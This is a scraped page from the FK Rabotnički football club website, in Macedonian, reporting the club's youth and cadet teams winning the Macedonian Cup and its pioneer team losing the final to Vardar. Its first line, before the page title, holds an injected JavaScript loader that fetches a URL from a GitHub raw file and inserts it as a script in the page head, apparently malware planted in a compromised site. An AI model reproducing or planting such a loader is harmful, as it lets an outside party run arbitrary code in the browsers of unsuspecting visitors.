;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Младите носат радост и освојуваат трофеи
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Младите носат радост и освојуваат трофеи

Фудбалската академија на Работнички е една од најдобрите во Македонија во изминатата деценија, а тоа се потврди и оваа сезона. Младинските тимови освоија трофеи и донесоа голема радост за клубот. Иднината воопшто не е доведена во прашање.

Младинската селекција на Работнички го освои Купот на Македонија, совладувајќи го тимот на Академија Пандев во Охрид со 3-1. Елиф Елмас беше стрелец на два гола за нашиот тим, во листата на стрелците се запиша и Фазлиу, а почесниот погодок за Академија Пандев беше дело на Трапановски.

kup-radost-mladi-2

Работнички е освојувач на Купот на Македонија и во кадетска конкуренција. Избраниците на тренерот Горан Станковски во финалето беа подобри од Академија Пандев со убедливи 3-0. Стефан Богдановски, Марио Станковски и Миле Тодоров беа стрелци за младите „романтичари“ на овој финален дуел.

Работнички играше во финалето на Купот и во пионерска конкуренција. Противник беше Вардар, кој во самата завршница успеа да стигне до триумф од 2-1 и да го освои пехарот, иако нашиот пионерски тим имаше водство од 0-1.

kup-radost-mladi-3

kup-radost-mladi-4